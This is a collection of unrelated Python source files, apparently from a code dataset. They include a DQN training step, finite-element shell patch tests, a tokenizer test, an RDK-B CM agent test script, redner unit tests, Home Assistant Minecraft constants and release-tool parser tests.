        config = self.config
        if len(self.memory) >= config.train_start:
            batch = self.__get_train_batch()
            self.step += 1
            self.optimizer.zero_grad()
            # Q(s, a) for the actions actually taken in the batch.
            action_idxs = batch["action"].view(-1, 1)
            values = self.policy_net(batch["state"]).gather(1, action_idxs)
            # Bootstrap target: max_a' Q_target(s', a'), left at zero for
            # terminal states; detach() keeps gradients out of the target net.
            next_values = torch.zeros(config.batch_size, device=config.device)
            terminal = batch["terminal"]
            non_terminal = batch["next_state"][~terminal]
            next_values[~terminal] = (
                self.target_net(non_terminal).max(dim=1)[0].detach()
            )
            expected_values = next_values * config.gamma + batch["reward"]
            loss = self.criterion(values, expected_values.unsqueeze(1))
            loss.backward()
            self.optimizer.step()
            self.history.append(loss.item())
            if self.step % config.update_step == 0:
                self.__update_target_net()
            if self.step % config.print_every == 0:
                print("Step:", self.step, "Loss:", loss.item())
    def __update_target_net(self) -> None:
        """Copy the current policy-network weights into the target network."""
        self.target_net.load_state_dict(self.policy_net.state_dict())
    def save_checkpoint(self) -> None:
        """Persist both networks, the optimizer state and the step counter."""
        state_dict = {
            name: getattr(self, name).state_dict()
            for name in ["policy_net", "target_net", "optimizer"]
        }
        state_dict["step"] = self.step
        torch.save(state_dict, self.config.model_path)
    def load_checkpoint(self, update_target_net: bool = False) -> None:
        """Restore state from ``config.model_path`` if it exists.

        When no checkpoint is present and *update_target_net* is true, the
        target network is initialised from the policy network instead.
        """
        config = self.config
        if path.exists(config.model_path):
            checkpoint = torch.load(
                config.model_path, map_location=config.device
            )
            for name in ["policy_net", "target_net", "optimizer"]:
                getattr(self, name).load_state_dict(checkpoint[name])
            self.step = checkpoint["step"]
        else:
            if update_target_net:
                self.__update_target_net()
| StarcoderdataPython |
9790978 | <gh_stars>0
import KratosMultiphysics
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
import KratosMultiphysics.KratosUnittest as KratosUnittest
class TestPatchTestShells(KratosUnittest.TestCase):
    """Patch tests for the corotational shell elements.

    Each test builds a tiny 5/9-node model, fixes three corner nodes,
    loads the fourth with a point load, solves one linear step and checks
    the displacement/rotation of the loaded node against reference values.
    """
    def setUp(self):
        # No shared fixture: each test builds its own model part.
        pass
    def _add_variables(self,mp):
        """Register the nodal solution-step variables the shells need."""
        mp.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        mp.AddNodalSolutionStepVariable(KratosMultiphysics.ROTATION)
        mp.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION)
        mp.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION_MOMENT)
        mp.AddNodalSolutionStepVariable(KratosMultiphysics.VOLUME_ACCELERATION)
        mp.AddNodalSolutionStepVariable(StructuralMechanicsApplication.POINT_LOAD)
    def _add_dofs(self,mp):
        # Adding the dofs AND their corresponding reaction!
        KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_X, KratosMultiphysics.REACTION_X,mp)
        KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Y, KratosMultiphysics.REACTION_Y,mp)
        KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Z, KratosMultiphysics.REACTION_Z,mp)
        KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_X, KratosMultiphysics.REACTION_MOMENT_X,mp)
        KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Y, KratosMultiphysics.REACTION_MOMENT_Y,mp)
        KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Z, KratosMultiphysics.REACTION_MOMENT_Z,mp)
    def _create_nodes(self,mp,element_name):
        """Create the (slightly warped) patch geometry for *element_name*."""
        mp.CreateNewNode(1, -0.5, - 0.45, 0.1)
        mp.CreateNewNode(2, 0.7, -0.5, 0.2)
        mp.CreateNewNode(3, 0.55, 0.6, 0.15)
        mp.CreateNewNode(4, -0.48, 0.65, 0.0)
        mp.CreateNewNode(5, 0.02, -0.01, -0.15)
        if element_name.endswith("4N"): # create additional nodes needed for quad-setup
            mp.CreateNewNode(6, -0.03, -0.5, 0.0)
            mp.CreateNewNode(7, 0.51, 0.02, 0.03)
            mp.CreateNewNode(8, -0.01, 0.52, -0.05)
            mp.CreateNewNode(9, -0.49, -0.0, 0.0)
    def _create_elements(self,mp,element_name):
        """Create 4 elements of *element_name* around the centre node 5."""
        if element_name.endswith("4N"): # Quadrilaterals
            mp.CreateNewElement(element_name, 1, [1,6,5,9], mp.GetProperties()[1])
            mp.CreateNewElement(element_name, 2, [6,2,7,5], mp.GetProperties()[1])
            mp.CreateNewElement(element_name, 3, [5,7,3,8], mp.GetProperties()[1])
            mp.CreateNewElement(element_name, 4, [9,5,8,4], mp.GetProperties()[1])
        else: # Triangles
            mp.CreateNewElement(element_name, 1, [1,2,5], mp.GetProperties()[1])
            mp.CreateNewElement(element_name, 2, [2,3,5], mp.GetProperties()[1])
            mp.CreateNewElement(element_name, 3, [3,4,5], mp.GetProperties()[1])
            mp.CreateNewElement(element_name, 4, [4,1,5], mp.GetProperties()[1])
    def _apply_dirichlet_BCs(self,mp):
        """Fully clamp (all displacements and rotations) the nodes of *mp*."""
        KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_X, True, mp.Nodes)
        KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_Y, True, mp.Nodes)
        KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.DISPLACEMENT_Z, True, mp.Nodes)
        KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.ROTATION_X, True, mp.Nodes)
        KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.ROTATION_Y, True, mp.Nodes)
        KratosMultiphysics.VariableUtils().ApplyFixity(KratosMultiphysics.ROTATION_Z, True, mp.Nodes)
    def _apply_neumann_BCs(self,mp):
        """Apply a fixed point load to every node of *mp*."""
        for node in mp.Nodes:
            node.SetSolutionStepValue(StructuralMechanicsApplication.POINT_LOAD,0,[6.1,-5.5,8.9])
            mp.CreateNewCondition("PointLoadCondition3D1N",1,[node.Id],mp.GetProperties()[1])
    def _apply_material_properties(self,mp):
        #define properties
        mp.GetProperties()[1].SetValue(KratosMultiphysics.YOUNG_MODULUS,100e3)
        mp.GetProperties()[1].SetValue(KratosMultiphysics.POISSON_RATIO,0.3)
        mp.GetProperties()[1].SetValue(KratosMultiphysics.THICKNESS,1.0)
        mp.GetProperties()[1].SetValue(KratosMultiphysics.DENSITY,1.0)
        g = [0,0,0]  # no body force
        mp.GetProperties()[1].SetValue(KratosMultiphysics.VOLUME_ACCELERATION,g)
        cl = StructuralMechanicsApplication.LinearElasticPlaneStress2DLaw()
        mp.GetProperties()[1].SetValue(KratosMultiphysics.CONSTITUTIVE_LAW,cl)
    def _solve(self,mp):
        """Assemble and solve one static step for model part *mp*.

        A plain linear strategy is used, so no convergence criterion or
        iteration limit is needed (the previously-created ResidualCriteria
        and max_iters locals were unused and have been removed).
        """
        linear_solver = KratosMultiphysics.SkylineLUFactorizationSolver()
        builder_and_solver = KratosMultiphysics.ResidualBasedBlockBuilderAndSolver(linear_solver)
        scheme = KratosMultiphysics.ResidualBasedIncrementalUpdateStaticScheme()
        compute_reactions = True
        reform_step_dofs = True
        calculate_norm_dx = False
        move_mesh_flag = True
        strategy = KratosMultiphysics.ResidualBasedLinearStrategy(mp,
                                                                  scheme,
                                                                  linear_solver,
                                                                  builder_and_solver,
                                                                  compute_reactions,
                                                                  reform_step_dofs,
                                                                  calculate_norm_dx,
                                                                  move_mesh_flag)
        strategy.SetEchoLevel(0)
        strategy.Check()
        strategy.Solve()
    def _check_results(self,node,displacement_results, rotation_results):
        #check that the results are exact on the node
        disp = node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT)
        self.assertAlmostEqual(disp[0], displacement_results[0], 10)
        self.assertAlmostEqual(disp[1], displacement_results[1], 10)
        self.assertAlmostEqual(disp[2], displacement_results[2], 10)
        rot = node.GetSolutionStepValue(KratosMultiphysics.ROTATION)
        self.assertAlmostEqual(rot[0], rotation_results[0], 10)
        self.assertAlmostEqual(rot[1], rotation_results[1], 10)
        self.assertAlmostEqual(rot[2], rotation_results[2], 10)
    def execute_shell_test(self, current_model,element_name, displacement_results, rotation_results, do_post_processing):
        """Build, solve and verify a patch test for *element_name*."""
        mp = current_model.CreateModelPart("solid_part")
        mp.SetBufferSize(2)
        self._add_variables(mp)
        self._apply_material_properties(mp)
        self._create_nodes(mp,element_name)
        self._add_dofs(mp)
        self._create_elements(mp,element_name)
        #create a submodelpart for dirichlet boundary conditions
        bcs_dirichlet = mp.CreateSubModelPart("BoundaryCondtionsDirichlet")
        bcs_dirichlet.AddNodes([1,2,4])
        #create a submodelpart for neumann boundary conditions
        bcs_neumann = mp.CreateSubModelPart("BoundaryCondtionsNeumann")
        bcs_neumann.AddNodes([3])
        self._apply_dirichlet_BCs(bcs_dirichlet)
        self._apply_neumann_BCs(bcs_neumann)
        self._solve(mp)
        # Node 3 is the loaded, unconstrained node whose response we verify.
        self._check_results(mp.Nodes[3],displacement_results, rotation_results)
        if do_post_processing:
            self.__post_process(mp)
    def test_thin_shell_triangle(self):
        element_name = "ShellThinElementCorotational3D3N"
        displacement_results = [0.0002324779832 , -0.0002233435997 , 0.0002567143455]
        rotation_results = [0.0003627433341 , -0.0001926662603 , -0.0004682681704]
        current_model = KratosMultiphysics.Model()
        self.execute_shell_test(current_model,
                                element_name,
                                displacement_results,
                                rotation_results,
                                False) # Do PostProcessing for GiD?
    def test_thick_shell_triangle(self):
        element_name = "ShellThickElementCorotational3D3N"
        displacement_results = [7.18997182e-05 , -0.0001572802804 , 0.0005263940488]
        rotation_results = [0.0003316612014 , -0.0002798472414 , 5.141506e-07]
        current_model = KratosMultiphysics.Model()
        self.execute_shell_test(current_model,
                                element_name,
                                displacement_results,
                                rotation_results,
                                False) # Do PostProcessing for GiD?
    def test_thin_shell_quadrilateral(self):
        element_name = "ShellThinElementCorotational3D4N"
        displacement_results = [0.0021909310921 , -0.0021683746759 , 0.0007191338749]
        rotation_results = [0.0028191154606 , 0.0008171818407 , -0.0069146010725]
        current_model = KratosMultiphysics.Model()
        self.execute_shell_test(current_model,
                                element_name,
                                displacement_results,
                                rotation_results,
                                False) # Do PostProcessing for GiD?
    def test_thick_shell_quadrilateral(self):
        element_name = "ShellThickElementCorotational3D4N"
        displacement_results = [0.0003572969872 , -0.0006341259132 , 0.00127807995001]
        rotation_results = [0.0012082600485 , -0.0004098356773 , -0.0011673798349]
        current_model = KratosMultiphysics.Model()
        self.execute_shell_test(current_model,
                                element_name,
                                displacement_results,
                                rotation_results,
                                False) # Do PostProcessing for GiD?
    def __post_process(self, main_model_part):
        """Optionally dump the solved model to a GiD binary result file."""
        # Imported lazily: only needed when post-processing is requested.
        from gid_output_process import GiDOutputProcess
        self.gid_output = GiDOutputProcess(main_model_part,
                                    "gid_output",
                                    KratosMultiphysics.Parameters("""
                                    {
                                        "result_file_configuration" : {
                                            "gidpost_flags": {
                                                "GiDPostMode": "GiD_PostBinary",
                                                "WriteDeformedMeshFlag": "WriteUndeformed",
                                                "WriteConditionsFlag": "WriteConditions",
                                                "MultiFileFlag": "SingleFile"
                                            },
                                            "nodal_results" : ["DISPLACEMENT", "ROTATION", "POINT_LOAD"],
                                            "gauss_point_results" : ["GREEN_LAGRANGE_STRAIN_TENSOR","CAUCHY_STRESS_TENSOR"]
                                        }
                                    }
                                    """)
                                    )
        self.gid_output.ExecuteInitialize()
        self.gid_output.ExecuteBeforeSolutionLoop()
        self.gid_output.ExecuteInitializeSolutionStep()
        self.gid_output.PrintOutput()
        self.gid_output.ExecuteFinalizeSolutionStep()
        self.gid_output.ExecuteFinalize()
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    KratosUnittest.main()
| StarcoderdataPython |
6620051 | <gh_stars>1-10
import pytest
from ...tests.common_tests import OperatorTestTemplate, ParamTuple
from ..whitespace_tokenizer import WhiteSpaceTokenizer
class TestWhiteSpaceTokenizer(OperatorTestTemplate):
params = [
ParamTuple(
"a \t \t \nb c",
[1, 0, 0, 0, 0, 0, 0, 2, 0, 3],
["a", "b", "c"],
[1, 2, 3],
id='eng',
),
ParamTuple(
" a \t \t \nb c\n\r",
[0, 0, 1, 0, 0, 0, 0, 0, 0, 2, 0, 3, 0, 0],
["a", "b", "c"],
[1, 2, 3],
id='eng with whitespace at head and tail',
),
ParamTuple(
"GB亂入",
[2, 2, 2, 2],
["GB亂入"],
[2],
id='zh',
),
ParamTuple(
"",
[],
[],
[],
id='empty string',
),
]
@pytest.fixture(scope='class')
def op(self):
return WhiteSpaceTokenizer()
def test_equal(self, op):
assert WhiteSpaceTokenizer() == op
| StarcoderdataPython |
12855513 | <filename>testscripts/RDKB/component/CMAgent/TS_CMAGENT_SetSessionId.py
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2016 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>15</version>
<name>TS_CMAGENT_SetSessionId</name>
<primitive_test_id/>
<primitive_test_name>CMAgent_SetSessionId</primitive_test_name>
<primitive_test_version>5</primitive_test_version>
<status>FREE</status>
<synopsis>TC_CMAGENT_1 - Set Session ID API Validation</synopsis>
<groups_id>4</groups_id>
<execution_time>1</execution_time>
<long_duration>false</long_duration>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_CMAGENT_1</test_case_id>
<test_objective>To Validate "Set Session ID" Function of CM Agent</test_objective>
<test_type>Positive</test_type>
<test_setup>XB3</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state else invoke cosa_start.sh manually that includes all the ccsp components and TDK Component"
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>None</api_or_interface_used>
<input_parameters>Json Interface:
API Name
CMAgent_SetSessionId
Input
1.sessionId as 0
2.pathname (Device.X_CISCO_COM_CableModem.)
3.override as 0 (This parameter will enable the reading of current session id and check set session id api with value read)
4. priority as 0</input_parameters>
<automation_approch>1.Configure the Function info in Test Manager GUI which needs to be tested
(CMAgent_SetSessionId - func name - "If not exists already"
cmagent - module name
Necessary I/P args as Mentioned in Input)
2.Python Script will be generated/overrided automically by Test Manager with provided arguments in configure page (TS_CMAGENT_SetSessionId.py)
3.Execute the generated Script(TS_CMAGENT_SetSessionId.py) using excution page of Test Manager GUI
4.cmagentstub which is a part of TDK Agent process, will be in listening mode to execute TDK Component function named CMAgent_SetSessionId through registered TDK cmagentstub function along with necessary Entry Values as arguments
5.CMAgent_SetSessionId function will call CCSP Base Interface Function named CcspBaseIf_SendcurrentSessionIDSignal, that inturn will call "CcspCcMbi_CurrentSessionIdSignal" along with provided input arguments to assign session id to global value of CM Agent
6.Responses(printf) from TDK Component,Ccsp Library function and cmagentstub would be logged in Agent Console log based on the debug info redirected to agent console
7.cmagentstub will validate the available result (from agent console log and Pointer to instance as non null ) with expected result (Eg:"Session ID assigned Succesfully") and the same is updated in agent console log
8.TestManager will publish the result in GUI as PASS/FAILURE based on the response from cmagentstub</automation_approch>
<except_output>CheckPoint 1:
Session ID assigned log from DUT should be available in Agent Console Log
CheckPoint 2:
TDK agent Test Function will log the test case result as PASS based on API response
CheckPoint 3:
TestManager GUI will publish the result as PASS in Execution page</except_output>
<priority>High</priority>
<test_stub_interface>None</test_stub_interface>
<test_script>TS_CMAGENT_SetSessionId</test_script>
<skipped>No</skipped>
<release_version/>
<remarks/>
</test_cases>
<script_tags/>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
# NOTE: this is a Python 2 TDK test script; <ipaddress>/<port> below are
# template placeholders substituted by the Test Manager before execution.
import tdklib;
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("cmagent","RDKB");
#IP and Port of box, No need to change,
#This will be replaced with corresponding Box Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_CMAGENT_SetSessionId');
#Get the result of connection with test component and STB
loadModuleresult =obj.getLoadModuleResult();
print "[LIB LOAD STATUS]  : %s" %loadModuleresult;
loadStatusExpected = "SUCCESS"
# Abort early if the cmagent stub could not be loaded on the device.
if loadStatusExpected not in loadModuleresult.upper():
    print "[Failed To Load CM Agent Stub from env TDK Path]"
    print "[Exiting the Script]"
    exit();
#Primitive test case which associated to this Script
tdkTestObj = obj.createTestStep('CMAgent_SetSessionId');
#Input Parameters
# override=0 makes the stub read the current session id and validate the
# set-session-id API against it (see the XML header above).
tdkTestObj.addParameter("pathname","Device.X_CISCO_COM_CableModem.");
tdkTestObj.addParameter("priority",0);
tdkTestObj.addParameter("sessionId",0);
tdkTestObj.addParameter("override",0);
expectedresult = "SUCCESS";
#Execute the test case in STB
tdkTestObj.executeTestCase(expectedresult);
#Get the result of execution
actualresult = tdkTestObj.getResult();
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
resultDetails = tdkTestObj.getResultDetails();
# Publish PASS/FAIL back to the Test Manager based on the stub's response.
if expectedresult in actualresult:
    #Set the result status of execution as success
    tdkTestObj.setResultStatus("SUCCESS");
    print "TEST STEP 1: Get the component session Id";
    print "EXPECTED RESULT 1: Should get the component session Id";
    print "ACTUAL RESULT 1: %s" %resultDetails;
    #Get the result of execution
    print "[TEST EXECUTION RESULT] : SUCCESS";
else:
    #Set the result status of execution as failure
    tdkTestObj.setResultStatus("FAILURE");
    print "TEST STEP 1: Get the component session Id";
    print "EXPECTED RESULT 1: Should get the component session Id";
    print "ACTUAL RESULT 1: %s" %resultDetails;
    #Get the result of execution
    print "[TEST EXECUTION RESULT] : FAILURE";
    print "[TEST EXECUTION RESULT] : %s" %resultDetails ;
obj.unloadModule("cmagent");
| StarcoderdataPython |
11276956 | <filename>tests/unit_tests.py
import pyredner
import redner
import numpy as np
import torch
def unit_tests():
    """Run redner's native unit tests.

    The device-aware tests run once on CPU (False); if CUDA is available
    they are repeated on GPU (True) after the device-independent derivative
    tests. Call order matches the original sequence exactly.
    """
    device_aware = (
        redner.test_sample_primary_rays,
        redner.test_scene_intersect,
        redner.test_sample_point_on_light,
        redner.test_active_pixels,
    )
    for test in device_aware:
        test(False)  # CPU pass
    # Derivative tests take no device flag.
    redner.test_camera_derivatives()
    redner.test_d_bsdf()
    redner.test_d_bsdf_sample()
    redner.test_d_bsdf_pdf()
    redner.test_d_intersect()
    redner.test_d_sample_shape()
    if torch.cuda.is_available():
        for test in device_aware:
            test(True)  # GPU pass
# Run the full suite at import/execution time (this file is used as a script).
unit_tests()
| StarcoderdataPython |
8045032 | <filename>homeassistant/components/minecraft_server/const.py<gh_stars>1000+
"""Constants for the Minecraft Server integration."""
ATTR_PLAYERS_LIST = "players_list"
DEFAULT_HOST = "localhost:25565"
DEFAULT_NAME = "Minecraft Server"
DEFAULT_PORT = 25565
DOMAIN = "minecraft_server"
ICON_LATENCY_TIME = "mdi:signal"
ICON_PLAYERS_MAX = "mdi:account-multiple"
ICON_PLAYERS_ONLINE = "mdi:account-multiple"
ICON_PROTOCOL_VERSION = "mdi:numeric"
ICON_STATUS = "mdi:lan"
ICON_VERSION = "mdi:numeric"
ICON_MOTD = "mdi:minecraft"
KEY_SERVERS = "servers"
MANUFACTURER = "Mojang AB"
NAME_LATENCY_TIME = "Latency Time"
NAME_PLAYERS_MAX = "Players Max"
NAME_PLAYERS_ONLINE = "Players Online"
NAME_PROTOCOL_VERSION = "Protocol Version"
NAME_STATUS = "Status"
NAME_VERSION = "Version"
NAME_MOTD = "World Message"
SCAN_INTERVAL = 60
SIGNAL_NAME_PREFIX = f"signal_{DOMAIN}"
SRV_RECORD_PREFIX = "_minecraft._tcp"
UNIT_PLAYERS_MAX = "players"
UNIT_PLAYERS_ONLINE = "players"
UNIT_PROTOCOL_VERSION = None
UNIT_VERSION = None
UNIT_MOTD = None
| StarcoderdataPython |
6652228 | #!/bin/env dls-python
import mock
import unittest
from dls_ade import dls_release
from mock import patch, ANY, MagicMock
from argparse import _StoreAction
from argparse import _StoreTrueAction
def set_up_mock(self, path):
    """Patch *path* for the remainder of the test and return the mock.

    The patcher's ``stop`` is registered with ``self.addCleanup`` *before*
    starting, so the patch is always undone when the test finishes.
    """
    patcher = patch(path)
    self.addCleanup(patcher.stop)
    mocked = patcher.start()
    return mocked
class ParserTest(unittest.TestCase):
    """Tests for the argument parser built by dls_release.make_parser().

    The first group patches the shared ArgParser helper methods and checks
    they are invoked with the expected arguments; the second group inspects
    the built parser's private _option_string_actions table to verify each
    option's action type, destination and short/long spellings.
    """
    def setUp(self):
        # Fresh parser for the attribute-inspection tests below.
        self.parser = dls_release.make_parser()
    @patch('dls_ade.dls_changes_since_release.ArgParser.add_module_name_arg')
    def test_module_name_set(self, parser_mock):
        dls_release.make_parser()
        parser_mock.assert_called_once_with()
    @patch('dls_ade.dls_changes_since_release.ArgParser.add_release_arg')
    def test_release_set(self, parser_mock):
        dls_release.make_parser()
        parser_mock.assert_called_once_with(optional=True)
    @patch('dls_ade.dls_changes_since_release.ArgParser.add_branch_flag')
    def test_branch_flag_set(self, parser_mock):
        dls_release.make_parser()
        parser_mock.assert_called_once_with(help_msg="Release from a branch")
    @patch('dls_ade.dls_changes_since_release.ArgParser.add_epics_version_flag')
    def test_epics_version_flag_set(self, parser_mock):
        dls_release.make_parser()
        parser_mock.assert_called_once_with(
            help_msg="Change the EPICS version. This will determine which "
                "build server your job is built on for EPICS modules. "
                "Default is from your environment")
    def test_force_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-f']
        self.assertIsInstance(option, _StoreTrueAction)
        self.assertEqual(option.dest, "force")
        self.assertIn("--force", option.option_strings)
    def test_no_test_build_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-t']
        self.assertIsInstance(option, _StoreTrueAction)
        self.assertEqual(option.dest, "skip_test")
        self.assertIn("--no-test-build", option.option_strings)
    def test_local_build_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-l']
        self.assertIsInstance(option, _StoreTrueAction)
        self.assertEqual(option.dest, "local_build")
        self.assertIn("--local-build-only", option.option_strings)
    def test_test_build_only_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-T']
        self.assertIsInstance(option, _StoreTrueAction)
        self.assertEqual(option.dest, "test_only")
        self.assertIn("--test_build-only", option.option_strings)
    def test_message_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-m']
        self.assertIsInstance(option, _StoreAction)
        self.assertEqual(option.type, str)
        self.assertEqual(option.default, "")
        self.assertEqual(option.dest, "message")
        self.assertIn("--message", option.option_strings)
    def test_next_version_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-n']
        self.assertIsInstance(option, _StoreTrueAction)
        self.assertEqual(option.dest, "next_version")
        self.assertIn("--next_version", option.option_strings)
    def test_commit_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-c']
        self.assertIsInstance(option, _StoreAction)
        self.assertEqual(option.type, str)
        self.assertEqual(option.dest, "commit")
        self.assertIn("--commit", option.option_strings)
    def test_rhel_version_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-r']
        self.assertIsInstance(option, _StoreAction)
        self.assertEqual(option.type, str)
        self.assertEqual(option.dest, "rhel_version")
        self.assertIn("--rhel_version", option.option_strings)
    def test_windows_option_has_correct_attributes(self):
        option = self.parser._option_string_actions['-w']
        self.assertIsInstance(option, _StoreAction)
        self.assertEqual(option.type, str)
        self.assertEqual(option.dest, "windows")
    def test_has_windows_option_with_short_name_w_long_name_windows(self):
        option = self.parser._option_string_actions['-w']
        self.assertIsNotNone(option)
        self.assertIn("--windows", option.option_strings)
class TestCreateBuildObject(unittest.TestCase):
    """Tests for dls_release.create_build_object().

    Bug fix: the two RedhatBuild tests previously shared the exact same
    method name, so the first definition was silently shadowed by the
    second and never executed. The rhel-only variant has been renamed so
    both now run.
    """

    def setUp(self):
        # Contact lookups would reach out to external services; stub them
        # for every test in this class.
        self.mock_lookup_contact_details = set_up_mock(
            self, 'dls_ade.dlsbuild.lookup_contact_details'
        )

    @patch('dls_ade.dls_release.dlsbuild.default_build')
    def test_given_empty_options_then_default_build_called_with_None(self, mock_default):
        options = FakeOptions()
        dls_release.create_build_object(options)
        self.assertTrue(mock_default.called)
        mock_default.assert_called_once_with(None)

    @patch('dls_ade.dls_release.dlsbuild.default_build')
    def test_given_epics_version_then_default_build_called_with_epics_version(self, mock_default):
        version = "R3.14.12.3"
        options = FakeOptions(epics_version=version)
        dls_release.create_build_object(options)
        mock_default.assert_called_once_with(version)

    @patch('dls_ade.dls_release.dlsbuild.RedhatBuild')
    def test_given_rhel_version_only_then_RedhatBuild_called_with_rhel_version_and_None(self, mock_build):
        # Renamed: previously duplicated the name of the test below and
        # was therefore shadowed and never run.
        rhel_version = "25"
        options = FakeOptions(rhel_version=rhel_version)
        dls_release.create_build_object(options)
        mock_build.assert_called_once_with(rhel_version, None)

    @patch('dls_ade.dls_release.dlsbuild.RedhatBuild')
    def test_given_rhel_version_then_RedhatBuild_called_with_rhel_and_epics_version(self, mock_build):
        rhel_version = "25"
        epics_version = "R3.14.12.3"
        options = FakeOptions(
            rhel_version=rhel_version,
            epics_version=epics_version)
        dls_release.create_build_object(options)
        mock_build.assert_called_once_with(rhel_version, epics_version)

    @patch('dls_ade.dls_release.dlsbuild.WindowsBuild')
    def test_given_windows_option_without_rhel_then_WindowsBuild_called_with_windows_and_epics_version(self, mock_build):
        windows = 'xp'
        options = FakeOptions(windows=windows)
        dls_release.create_build_object(options)
        mock_build.assert_called_once_with(windows, None)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    @patch('dls_ade.dls_release.dlsbuild.Builder.set_area')
    def test_given_any_option_then_set_area_called_with_default_area_option(
            self, mock_set, _1):
        options = FakeOptions()
        dls_release.create_build_object(options)
        mock_set.assert_called_once_with(options.area)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    @patch('dls_ade.dls_release.dlsbuild.Builder.set_area')
    def test_given_area_option_then_set_area_called_with_given_area_option(self, mock_set, _1):
        area = 'python'
        options = FakeOptions(area=area)
        dls_release.create_build_object(options)
        mock_set.assert_called_once_with(options.area)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    @patch('dls_ade.dls_release.dlsbuild.Builder.set_force')
    def test_given_any_option_then_set_force_called_with_default_force_option(self, mock_set, _1):
        # FakeOptions defaults force to None.
        options = FakeOptions()
        dls_release.create_build_object(options)
        mock_set.assert_called_once_with(None)

    @patch('dls_ade.dlsbuild.default_server', return_value='redhat6-x86_64')
    @patch('dls_ade.dls_release.dlsbuild.Builder.set_force')
    def test_given_force_option_then_set_force_called_with_given_force_option(self, mock_set, _1):
        force = True
        options = FakeOptions(force=force)
        dls_release.create_build_object(options)
        mock_set.assert_called_once_with(True)
class TestCheckParsedOptionsValid(unittest.TestCase):
    """Tests for dls_release.check_parsed_arguments_valid().

    Each test configures a MagicMock argument object, runs the checker,
    and then inspects the patched ArgParser.error to see whether (and
    with what message) the arguments were rejected.
    """

    def setUp(self):
        self.parser = dls_release.make_parser()
        # Patch ArgParser.error so an invalid-argument report is recorded
        # on a mock instead of terminating the process.
        parse_error_patch = patch('dls_ade.dls_release.ArgParser.error')
        self.addCleanup(parse_error_patch.stop)
        self.mock_error = parse_error_patch.start()
        # MagicMock auto-creates any attribute the checker touches; only
        # values relevant to a given test are set explicitly.
        self.args = MagicMock()
        self.args.module_name = ""
        self.args.release = ""
        self.args.next_version = False

    def test_given_no_module_name_then_parser_error_specifying_no_module_name(self):
        expected_error_msg = 'Module name not specified'
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_msg)

    def test_given_no_release_not_test_commit_then_parser_error_called_specifying_no_module_version(self):
        self.args.module_name = "build"
        self.args.commit = ""
        expected_error_msg = 'Module release not specified; required unless'
        expected_error_msg += ' testing a specified commit, or requesting'
        expected_error_msg += ' next version.'
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_msg)

    def test_given_default_area_and_module_of_redirector_then_parser_error_not_called(self):
        self.args.module_name = "redirector"
        self.args.release = "12"
        self.args.area = "support"
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        # call_count of 0 is falsy, i.e. error() was never invoked.
        self.assertFalse(self.mock_error.call_count)

    def test_given_git_and_archive_area_else_good_options_then_raise_error(self):
        self.args.module_name = "module"
        self.args.release = "version"
        self.args.area = "archive"
        expected_error_message = self.args.area + " area not valid"
        dls_release.check_parsed_arguments_valid(self.args, self.parser)
        self.mock_error.assert_called_once_with(expected_error_message)

    def test_python3_with_rhel_6_raises_error(self):
        # Both python3 areas are rejected on RHEL6.
        areas = {"python3", "python3ext"}
        for area in areas:
            self.args.module_name = "module"
            self.args.release = "version"
            self.args.rhel_version = "6"
            self.args.area = area
            expected_error_message = self.args.area + " releases cannot be " \
                                                      "made for RHEL6"
            dls_release.check_parsed_arguments_valid(self.args, self.parser)
            self.mock_error.assert_called_once_with(expected_error_message)
            # Reset so the next loop iteration can assert a fresh call.
            self.mock_error.reset_mock()
